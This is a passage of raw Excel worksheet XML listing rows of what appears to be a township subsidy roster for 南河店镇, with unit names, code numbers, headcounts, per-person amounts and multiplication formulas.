    <row r="2546" ht="23" customHeight="1" spans="1:11">
      <c r="A2546" s="13" t="s">
        <v>6669</v>
      </c>
      <c r="B2546" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2546" s="14" t="s">
        <v>5545</v>
      </c>
      <c r="D2546" s="14" t="s">
        <v>6670</v>
      </c>
      <c r="E2546" s="14" t="s">
        <v>1313</v>
      </c>
      <c r="F2546" s="14" t="s">
        <v>6585</v>
      </c>
      <c r="G2546" s="14">
        <v>2</v>
      </c>
      <c r="H2546" s="14">
        <v>300</v>
      </c>
      <c r="I2546" s="14">
        <f t="shared" si="119"/>
        <v>600</v>
      </c>
      <c r="J2546" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2546" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2547" ht="23" customHeight="1" spans="1:11">
      <c r="A2547" s="13" t="s">
        <v>6671</v>
      </c>
      <c r="B2547" s="14" t="str">
        <f>B2546</f>
        <v>南河店镇</v>
      </c>
      <c r="C2547" s="14" t="str">
        <f>C2546</f>
        <v>商业中心</v>
      </c>
      <c r="D2547" s="13" t="s">
        <v>6672</v>
      </c>
      <c r="E2547" s="13" t="s">
        <v>6673</v>
      </c>
      <c r="F2547" s="14" t="str">
        <f>F2546</f>
        <v>4113211003</v>
      </c>
      <c r="G2547" s="14"/>
      <c r="H2547" s="14"/>
      <c r="I2547" s="14"/>
      <c r="J2547" s="14"/>
      <c r="K2547" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2548" ht="23" customHeight="1" spans="1:11">
      <c r="A2548" s="13" t="s">
        <v>6674</v>
      </c>
      <c r="B2548" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2548" s="14" t="s">
        <v>6675</v>
      </c>
      <c r="D2548" s="14" t="s">
        <v>6676</v>
      </c>
      <c r="E2548" s="14" t="s">
        <v>6677</v>
      </c>
      <c r="F2548" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2548" s="14">
        <v>1</v>
      </c>
      <c r="H2548" s="14">
        <v>340</v>
      </c>
      <c r="I2548" s="14">
        <f t="shared" ref="I2548:I2557" si="120">H2548*G2548</f>
        <v>340</v>
      </c>
      <c r="J2548" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2548" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2549" ht="23" customHeight="1" spans="1:11">
      <c r="A2549" s="13" t="s">
        <v>6678</v>
      </c>
      <c r="B2549" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2549" s="14" t="s">
        <v>6679</v>
      </c>
      <c r="D2549" s="14" t="s">
        <v>6680</v>
      </c>
      <c r="E2549" s="14" t="s">
        <v>6681</v>
      </c>
      <c r="F2549" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2549" s="14">
        <v>1</v>
      </c>
      <c r="H2549" s="14">
        <v>340</v>
      </c>
      <c r="I2549" s="14">
        <f t="shared" si="120"/>
        <v>340</v>
      </c>
      <c r="J2549" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2549" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2550" ht="23" customHeight="1" spans="1:11">
      <c r="A2550" s="13" t="s">
        <v>6682</v>
      </c>
      <c r="B2550" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2550" s="14" t="s">
        <v>6679</v>
      </c>
      <c r="D2550" s="14" t="s">
        <v>6683</v>
      </c>
      <c r="E2550" s="14" t="s">
        <v>6545</v>
      </c>
      <c r="F2550" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2550" s="14">
        <v>1</v>
      </c>
      <c r="H2550" s="14">
        <v>340</v>
      </c>
      <c r="I2550" s="14">
        <f t="shared" si="120"/>
        <v>340</v>
      </c>
      <c r="J2550" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2550" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2551" ht="23" customHeight="1" spans="1:11">
      <c r="A2551" s="13" t="s">
        <v>6684</v>
      </c>
      <c r="B2551" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2551" s="14" t="s">
        <v>6679</v>
      </c>
      <c r="D2551" s="14" t="s">
        <v>6685</v>
      </c>
      <c r="E2551" s="14" t="s">
        <v>6686</v>
      </c>
      <c r="F2551" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2551" s="14">
        <v>1</v>
      </c>
      <c r="H2551" s="14">
        <v>340</v>
      </c>
      <c r="I2551" s="14">
        <f t="shared" si="120"/>
        <v>340</v>
      </c>
      <c r="J2551" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2551" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2552" ht="23" customHeight="1" spans="1:11">
      <c r="A2552" s="13" t="s">
        <v>6687</v>
      </c>
      <c r="B2552" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2552" s="14" t="s">
        <v>6679</v>
      </c>
      <c r="D2552" s="14" t="s">
        <v>6688</v>
      </c>
      <c r="E2552" s="14" t="s">
        <v>637</v>
      </c>
      <c r="F2552" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2552" s="14">
        <v>1</v>
      </c>
      <c r="H2552" s="14">
        <v>340</v>
      </c>
      <c r="I2552" s="14">
        <f t="shared" si="120"/>
        <v>340</v>
      </c>
      <c r="J2552" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2552" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2553" ht="23" customHeight="1" spans="1:11">
      <c r="A2553" s="13" t="s">
        <v>6689</v>
      </c>
      <c r="B2553" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2553" s="14" t="s">
        <v>6679</v>
      </c>
      <c r="D2553" s="14" t="s">
        <v>6690</v>
      </c>
      <c r="E2553" s="14" t="s">
        <v>6627</v>
      </c>
      <c r="F2553" s="14" t="s">
        <v>6691</v>
      </c>
      <c r="G2553" s="14">
        <v>1</v>
      </c>
      <c r="H2553" s="14">
        <v>340</v>
      </c>
      <c r="I2553" s="14">
        <f t="shared" si="120"/>
        <v>340</v>
      </c>
      <c r="J2553" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2553" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2554" ht="23" customHeight="1" spans="1:11">
      <c r="A2554" s="13" t="s">
        <v>6692</v>
      </c>
      <c r="B2554" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2554" s="14" t="s">
        <v>6679</v>
      </c>
      <c r="D2554" s="14" t="s">
        <v>6693</v>
      </c>
      <c r="E2554" s="14" t="s">
        <v>6694</v>
      </c>
      <c r="F2554" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2554" s="14">
        <v>1</v>
      </c>
      <c r="H2554" s="14">
        <v>340</v>
      </c>
      <c r="I2554" s="14">
        <f t="shared" si="120"/>
        <v>340</v>
      </c>
      <c r="J2554" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2554" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2555" ht="23" customHeight="1" spans="1:11">
      <c r="A2555" s="13" t="s">
        <v>6695</v>
      </c>
      <c r="B2555" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2555" s="14" t="s">
        <v>6679</v>
      </c>
      <c r="D2555" s="14" t="s">
        <v>6696</v>
      </c>
      <c r="E2555" s="14" t="s">
        <v>6697</v>
      </c>
      <c r="F2555" s="14" t="s">
        <v>6698</v>
      </c>
      <c r="G2555" s="14">
        <v>1</v>
      </c>
      <c r="H2555" s="14">
        <v>340</v>
      </c>
      <c r="I2555" s="14">
        <f t="shared" si="120"/>
        <v>340</v>
      </c>
      <c r="J2555" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2555" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2556" ht="23" customHeight="1" spans="1:11">
      <c r="A2556" s="13" t="s">
        <v>6699</v>
      </c>
      <c r="B2556" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2556" s="14" t="s">
        <v>5551</v>
      </c>
      <c r="D2556" s="14" t="s">
        <v>6700</v>
      </c>
      <c r="E2556" s="14" t="s">
        <v>6701</v>
      </c>
      <c r="F2556" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2556" s="14">
        <v>1</v>
      </c>
      <c r="H2556" s="14">
        <v>340</v>
      </c>
      <c r="I2556" s="14">
        <f t="shared" si="120"/>
        <v>340</v>
      </c>
      <c r="J2556" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2556" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2557" ht="23" customHeight="1" spans="1:11">
      <c r="A2557" s="13" t="s">
        <v>6702</v>
      </c>
      <c r="B2557" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2557" s="14" t="s">
        <v>5551</v>
      </c>
      <c r="D2557" s="14" t="s">
        <v>6703</v>
      </c>
      <c r="E2557" s="14" t="s">
        <v>6704</v>
      </c>
      <c r="F2557" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2557" s="14">
        <v>2</v>
      </c>
      <c r="H2557" s="14">
        <v>300</v>
      </c>
      <c r="I2557" s="14">
        <f t="shared" si="120"/>
        <v>600</v>
      </c>
      <c r="J2557" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2557" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2558" ht="23" customHeight="1" spans="1:11">
      <c r="A2558" s="13" t="s">
        <v>6705</v>
      </c>
      <c r="B2558" s="14" t="str">
        <f>B2557</f>
        <v>南河店镇</v>
      </c>
      <c r="C2558" s="14" t="str">
        <f>C2557</f>
        <v>县社</v>
      </c>
      <c r="D2558" s="19" t="s">
        <v>6706</v>
      </c>
      <c r="E2558" s="19" t="s">
        <v>6707</v>
      </c>
      <c r="F2558" s="14" t="str">
        <f>F2557</f>
        <v>4113211004</v>
      </c>
      <c r="G2558" s="14"/>
      <c r="H2558" s="14"/>
      <c r="I2558" s="14"/>
      <c r="J2558" s="14"/>
      <c r="K2558" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2559" ht="23" customHeight="1" spans="1:11">
      <c r="A2559" s="13" t="s">
        <v>6708</v>
      </c>
      <c r="B2559" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2559" s="14" t="s">
        <v>5551</v>
      </c>
      <c r="D2559" s="14" t="s">
        <v>2962</v>
      </c>
      <c r="E2559" s="14" t="s">
        <v>6709</v>
      </c>
      <c r="F2559" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2559" s="14">
        <v>1</v>
      </c>
      <c r="H2559" s="14">
        <v>340</v>
      </c>
      <c r="I2559" s="14">
        <f>H2559*G2559</f>
        <v>340</v>
      </c>
      <c r="J2559" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2559" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2560" ht="23" customHeight="1" spans="1:11">
      <c r="A2560" s="13" t="s">
        <v>6710</v>
      </c>
      <c r="B2560" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2560" s="14" t="s">
        <v>5551</v>
      </c>
      <c r="D2560" s="14" t="s">
        <v>6711</v>
      </c>
      <c r="E2560" s="14" t="s">
        <v>6627</v>
      </c>
      <c r="F2560" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2560" s="14">
        <v>3</v>
      </c>
      <c r="H2560" s="14">
        <v>265</v>
      </c>
      <c r="I2560" s="14">
        <f>H2560*G2560</f>
        <v>795</v>
      </c>
      <c r="J2560" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2560" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2561" ht="23" customHeight="1" spans="1:11">
      <c r="A2561" s="13" t="s">
        <v>6712</v>
      </c>
      <c r="B2561" s="14" t="str">
        <f>B2560</f>
        <v>南河店镇</v>
      </c>
      <c r="C2561" s="14" t="str">
        <f>C2560</f>
        <v>县社</v>
      </c>
      <c r="D2561" s="19" t="s">
        <v>6713</v>
      </c>
      <c r="E2561" s="19" t="s">
        <v>1274</v>
      </c>
      <c r="F2561" s="14" t="str">
        <f>F2560</f>
        <v>4113211004</v>
      </c>
      <c r="G2561" s="14"/>
      <c r="H2561" s="14"/>
      <c r="I2561" s="14"/>
      <c r="J2561" s="14"/>
      <c r="K2561" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2562" ht="23" customHeight="1" spans="1:11">
      <c r="A2562" s="13" t="s">
        <v>6714</v>
      </c>
      <c r="B2562" s="14" t="str">
        <f>B2561</f>
        <v>南河店镇</v>
      </c>
      <c r="C2562" s="14" t="str">
        <f>C2561</f>
        <v>县社</v>
      </c>
      <c r="D2562" s="19" t="s">
        <v>6715</v>
      </c>
      <c r="E2562" s="19" t="s">
        <v>6716</v>
      </c>
      <c r="F2562" s="14" t="str">
        <f>F2561</f>
        <v>4113211004</v>
      </c>
      <c r="G2562" s="14"/>
      <c r="H2562" s="14"/>
      <c r="I2562" s="14"/>
      <c r="J2562" s="14"/>
      <c r="K2562" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2563" ht="23" customHeight="1" spans="1:11">
      <c r="A2563" s="13" t="s">
        <v>6717</v>
      </c>
      <c r="B2563" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2563" s="14" t="s">
        <v>5551</v>
      </c>
      <c r="D2563" s="14" t="s">
        <v>6718</v>
      </c>
      <c r="E2563" s="14" t="s">
        <v>6719</v>
      </c>
      <c r="F2563" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2563" s="14">
        <v>1</v>
      </c>
      <c r="H2563" s="14">
        <v>340</v>
      </c>
      <c r="I2563" s="14">
        <f t="shared" ref="I2563:I2571" si="121">H2563*G2563</f>
        <v>340</v>
      </c>
      <c r="J2563" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2563" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2564" ht="23" customHeight="1" spans="1:11">
      <c r="A2564" s="13" t="s">
        <v>6720</v>
      </c>
      <c r="B2564" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2564" s="14" t="s">
        <v>5551</v>
      </c>
      <c r="D2564" s="14" t="s">
        <v>6721</v>
      </c>
      <c r="E2564" s="14" t="s">
        <v>6722</v>
      </c>
      <c r="F2564" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2564" s="14">
        <v>1</v>
      </c>
      <c r="H2564" s="14">
        <v>340</v>
      </c>
      <c r="I2564" s="14">
        <f t="shared" si="121"/>
        <v>340</v>
      </c>
      <c r="J2564" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2564" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2565" ht="23" customHeight="1" spans="1:11">
      <c r="A2565" s="13" t="s">
        <v>6723</v>
      </c>
      <c r="B2565" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2565" s="14" t="s">
        <v>5551</v>
      </c>
      <c r="D2565" s="14" t="s">
        <v>6724</v>
      </c>
      <c r="E2565" s="14" t="s">
        <v>6725</v>
      </c>
      <c r="F2565" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2565" s="14">
        <v>1</v>
      </c>
      <c r="H2565" s="14">
        <v>340</v>
      </c>
      <c r="I2565" s="14">
        <f t="shared" si="121"/>
        <v>340</v>
      </c>
      <c r="J2565" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2565" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2566" ht="23" customHeight="1" spans="1:11">
      <c r="A2566" s="13" t="s">
        <v>6726</v>
      </c>
      <c r="B2566" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2566" s="14" t="s">
        <v>5551</v>
      </c>
      <c r="D2566" s="14" t="s">
        <v>6727</v>
      </c>
      <c r="E2566" s="14" t="s">
        <v>2828</v>
      </c>
      <c r="F2566" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2566" s="14">
        <v>1</v>
      </c>
      <c r="H2566" s="14">
        <v>340</v>
      </c>
      <c r="I2566" s="14">
        <f t="shared" si="121"/>
        <v>340</v>
      </c>
      <c r="J2566" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2566" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2567" ht="23" customHeight="1" spans="1:11">
      <c r="A2567" s="13" t="s">
        <v>6728</v>
      </c>
      <c r="B2567" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2567" s="14" t="s">
        <v>5551</v>
      </c>
      <c r="D2567" s="14" t="s">
        <v>6729</v>
      </c>
      <c r="E2567" s="14" t="s">
        <v>6730</v>
      </c>
      <c r="F2567" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2567" s="14">
        <v>1</v>
      </c>
      <c r="H2567" s="14">
        <v>340</v>
      </c>
      <c r="I2567" s="14">
        <f t="shared" si="121"/>
        <v>340</v>
      </c>
      <c r="J2567" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2567" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2568" ht="23" customHeight="1" spans="1:11">
      <c r="A2568" s="13" t="s">
        <v>6731</v>
      </c>
      <c r="B2568" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2568" s="14" t="s">
        <v>5551</v>
      </c>
      <c r="D2568" s="14" t="s">
        <v>6732</v>
      </c>
      <c r="E2568" s="14" t="s">
        <v>6633</v>
      </c>
      <c r="F2568" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2568" s="14">
        <v>1</v>
      </c>
      <c r="H2568" s="14">
        <v>340</v>
      </c>
      <c r="I2568" s="14">
        <f t="shared" si="121"/>
        <v>340</v>
      </c>
      <c r="J2568" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2568" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2569" ht="23" customHeight="1" spans="1:11">
      <c r="A2569" s="13" t="s">
        <v>6733</v>
      </c>
      <c r="B2569" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2569" s="14" t="s">
        <v>5551</v>
      </c>
      <c r="D2569" s="14" t="s">
        <v>6734</v>
      </c>
      <c r="E2569" s="14" t="s">
        <v>6735</v>
      </c>
      <c r="F2569" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2569" s="14">
        <v>1</v>
      </c>
      <c r="H2569" s="14">
        <v>340</v>
      </c>
      <c r="I2569" s="14">
        <f t="shared" si="121"/>
        <v>340</v>
      </c>
      <c r="J2569" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2569" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2570" ht="23" customHeight="1" spans="1:11">
      <c r="A2570" s="13" t="s">
        <v>6736</v>
      </c>
      <c r="B2570" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2570" s="14" t="s">
        <v>5551</v>
      </c>
      <c r="D2570" s="14" t="s">
        <v>6737</v>
      </c>
      <c r="E2570" s="14" t="s">
        <v>6738</v>
      </c>
      <c r="F2570" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2570" s="14">
        <v>1</v>
      </c>
      <c r="H2570" s="14">
        <v>340</v>
      </c>
      <c r="I2570" s="14">
        <f t="shared" si="121"/>
        <v>340</v>
      </c>
      <c r="J2570" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2570" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2571" ht="23" customHeight="1" spans="1:11">
      <c r="A2571" s="13" t="s">
        <v>6739</v>
      </c>
      <c r="B2571" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2571" s="14" t="s">
        <v>5551</v>
      </c>
      <c r="D2571" s="14" t="s">
        <v>6740</v>
      </c>
      <c r="E2571" s="14" t="s">
        <v>6735</v>
      </c>
      <c r="F2571" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2571" s="14">
        <v>2</v>
      </c>
      <c r="H2571" s="14">
        <v>300</v>
      </c>
      <c r="I2571" s="14">
        <f t="shared" si="121"/>
        <v>600</v>
      </c>
      <c r="J2571" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2571" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2572" ht="23" customHeight="1" spans="1:11">
      <c r="A2572" s="13" t="s">
        <v>6741</v>
      </c>
      <c r="B2572" s="14" t="str">
        <f>B2571</f>
        <v>南河店镇</v>
      </c>
      <c r="C2572" s="14" t="str">
        <f>C2571</f>
        <v>县社</v>
      </c>
      <c r="D2572" s="18" t="s">
        <v>6742</v>
      </c>
      <c r="E2572" s="18" t="s">
        <v>6743</v>
      </c>
      <c r="F2572" s="14" t="str">
        <f>F2571</f>
        <v>4113211004</v>
      </c>
      <c r="G2572" s="14"/>
      <c r="H2572" s="14"/>
      <c r="I2572" s="14"/>
      <c r="J2572" s="14"/>
      <c r="K2572" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2573" ht="23" customHeight="1" spans="1:11">
      <c r="A2573" s="13" t="s">
        <v>6744</v>
      </c>
      <c r="B2573" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2573" s="14" t="s">
        <v>5551</v>
      </c>
      <c r="D2573" s="14" t="s">
        <v>6745</v>
      </c>
      <c r="E2573" s="14" t="s">
        <v>2703</v>
      </c>
      <c r="F2573" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2573" s="14">
        <v>1</v>
      </c>
      <c r="H2573" s="14">
        <v>340</v>
      </c>
      <c r="I2573" s="14">
        <f t="shared" ref="I2573:I2579" si="122">H2573*G2573</f>
        <v>340</v>
      </c>
      <c r="J2573" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2573" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2574" ht="23" customHeight="1" spans="1:11">
      <c r="A2574" s="13" t="s">
        <v>6746</v>
      </c>
      <c r="B2574" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2574" s="14" t="s">
        <v>6679</v>
      </c>
      <c r="D2574" s="14" t="s">
        <v>6747</v>
      </c>
      <c r="E2574" s="14" t="s">
        <v>6748</v>
      </c>
      <c r="F2574" s="14" t="s">
        <v>6749</v>
      </c>
      <c r="G2574" s="14">
        <v>1</v>
      </c>
      <c r="H2574" s="14">
        <v>340</v>
      </c>
      <c r="I2574" s="14">
        <f t="shared" si="122"/>
        <v>340</v>
      </c>
      <c r="J2574" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2574" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2575" ht="23" customHeight="1" spans="1:11">
      <c r="A2575" s="13" t="s">
        <v>6750</v>
      </c>
      <c r="B2575" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2575" s="14" t="s">
        <v>6679</v>
      </c>
      <c r="D2575" s="14" t="s">
        <v>6751</v>
      </c>
      <c r="E2575" s="14" t="s">
        <v>6752</v>
      </c>
      <c r="F2575" s="14" t="s">
        <v>6588</v>
      </c>
      <c r="G2575" s="14">
        <v>1</v>
      </c>
      <c r="H2575" s="14">
        <v>340</v>
      </c>
      <c r="I2575" s="14">
        <f t="shared" si="122"/>
        <v>340</v>
      </c>
      <c r="J2575" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2575" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2576" ht="23" customHeight="1" spans="1:11">
      <c r="A2576" s="13" t="s">
        <v>6753</v>
      </c>
      <c r="B2576" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2576" s="14" t="s">
        <v>6679</v>
      </c>
      <c r="D2576" s="14" t="s">
        <v>6754</v>
      </c>
      <c r="E2576" s="14" t="s">
        <v>6694</v>
      </c>
      <c r="F2576" s="14" t="s">
        <v>6602</v>
      </c>
      <c r="G2576" s="14">
        <v>1</v>
      </c>
      <c r="H2576" s="14">
        <v>340</v>
      </c>
      <c r="I2576" s="14">
        <f t="shared" si="122"/>
        <v>340</v>
      </c>
      <c r="J2576" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2576" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2577" ht="23" customHeight="1" spans="1:11">
      <c r="A2577" s="13" t="s">
        <v>6755</v>
      </c>
      <c r="B2577" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2577" s="14" t="s">
        <v>6756</v>
      </c>
      <c r="D2577" s="14" t="s">
        <v>6757</v>
      </c>
      <c r="E2577" s="14" t="s">
        <v>4021</v>
      </c>
      <c r="F2577" s="14" t="s">
        <v>6758</v>
      </c>
      <c r="G2577" s="14">
        <v>1</v>
      </c>
      <c r="H2577" s="14">
        <v>340</v>
      </c>
      <c r="I2577" s="14">
        <f t="shared" si="122"/>
        <v>340</v>
      </c>
      <c r="J2577" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2577" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2578" ht="23" customHeight="1" spans="1:11">
      <c r="A2578" s="13" t="s">
        <v>6759</v>
      </c>
      <c r="B2578" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2578" s="14" t="s">
        <v>3560</v>
      </c>
      <c r="D2578" s="14" t="s">
        <v>6760</v>
      </c>
      <c r="E2578" s="14" t="s">
        <v>3146</v>
      </c>
      <c r="F2578" s="14" t="s">
        <v>6698</v>
      </c>
      <c r="G2578" s="14">
        <v>1</v>
      </c>
      <c r="H2578" s="14">
        <v>340</v>
      </c>
      <c r="I2578" s="14">
        <f t="shared" si="122"/>
        <v>340</v>
      </c>
      <c r="J2578" s="14" t="s">
        <v>6761</v>
      </c>
      <c r="K2578" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2579" ht="23" customHeight="1" spans="1:11">
      <c r="A2579" s="13" t="s">
        <v>6762</v>
      </c>
      <c r="B2579" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2579" s="14" t="s">
        <v>3551</v>
      </c>
      <c r="D2579" s="14" t="s">
        <v>6763</v>
      </c>
      <c r="E2579" s="14" t="s">
        <v>1902</v>
      </c>
      <c r="F2579" s="14" t="s">
        <v>6698</v>
      </c>
      <c r="G2579" s="14">
        <v>3</v>
      </c>
      <c r="H2579" s="14">
        <v>265</v>
      </c>
      <c r="I2579" s="14">
        <f t="shared" si="122"/>
        <v>795</v>
      </c>
      <c r="J2579" s="14" t="s">
        <v>4797</v>
      </c>
      <c r="K2579" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2580" ht="23" customHeight="1" spans="1:11">
      <c r="A2580" s="13" t="s">
        <v>6764</v>
      </c>
      <c r="B2580" s="14" t="str">
        <f>B2579</f>
        <v>南河店镇</v>
      </c>
      <c r="C2580" s="14" t="str">
        <f>C2579</f>
        <v>供销社</v>
      </c>
      <c r="D2580" s="30" t="s">
        <v>6765</v>
      </c>
      <c r="E2580" s="82" t="s">
        <v>6766</v>
      </c>
      <c r="F2580" s="14" t="str">
        <f>F2579</f>
        <v>4113211020</v>
      </c>
      <c r="G2580" s="14"/>
      <c r="H2580" s="14"/>
      <c r="I2580" s="14"/>
      <c r="J2580" s="14"/>
      <c r="K2580" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2581" ht="23" customHeight="1" spans="1:11">
      <c r="A2581" s="13" t="s">
        <v>6767</v>
      </c>
      <c r="B2581" s="14" t="str">
        <f>B2580</f>
        <v>南河店镇</v>
      </c>
      <c r="C2581" s="14" t="str">
        <f>C2580</f>
        <v>供销社</v>
      </c>
      <c r="D2581" s="82" t="s">
        <v>6768</v>
      </c>
      <c r="E2581" s="82" t="s">
        <v>6769</v>
      </c>
      <c r="F2581" s="14" t="str">
        <f>F2580</f>
        <v>4113211020</v>
      </c>
      <c r="G2581" s="14"/>
      <c r="H2581" s="14"/>
      <c r="I2581" s="14"/>
      <c r="J2581" s="14"/>
      <c r="K2581" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2582" ht="23" customHeight="1" spans="1:11">
      <c r="A2582" s="13" t="s">
        <v>6770</v>
      </c>
      <c r="B2582" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2582" s="14" t="s">
        <v>6771</v>
      </c>
      <c r="D2582" s="14" t="s">
        <v>6772</v>
      </c>
      <c r="E2582" s="14" t="s">
        <v>6644</v>
      </c>
      <c r="F2582" s="14" t="s">
        <v>6585</v>
      </c>
      <c r="G2582" s="14">
        <v>1</v>
      </c>
      <c r="H2582" s="14">
        <v>340</v>
      </c>
      <c r="I2582" s="14">
        <f>H2582*G2582</f>
        <v>340</v>
      </c>
      <c r="J2582" s="14" t="s">
        <v>4751</v>
      </c>
      <c r="K2582" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2583" ht="23" customHeight="1" spans="1:11">
      <c r="A2583" s="13" t="s">
        <v>6773</v>
      </c>
      <c r="B2583" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2583" s="14" t="s">
        <v>3539</v>
      </c>
      <c r="D2583" s="14" t="s">
        <v>6774</v>
      </c>
      <c r="E2583" s="14" t="s">
        <v>6644</v>
      </c>
      <c r="F2583" s="14" t="s">
        <v>6698</v>
      </c>
      <c r="G2583" s="14">
        <v>1</v>
      </c>
      <c r="H2583" s="14">
        <v>340</v>
      </c>
      <c r="I2583" s="14">
        <f>H2583*G2583</f>
        <v>340</v>
      </c>
      <c r="J2583" s="14" t="s">
        <v>4822</v>
      </c>
      <c r="K2583" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2584" ht="23" customHeight="1" spans="1:11">
      <c r="A2584" s="13" t="s">
        <v>6775</v>
      </c>
      <c r="B2584" s="14" t="s">
        <v>6582</v>
      </c>
      <c r="C2584" s="14" t="s">
        <v>6776</v>
      </c>
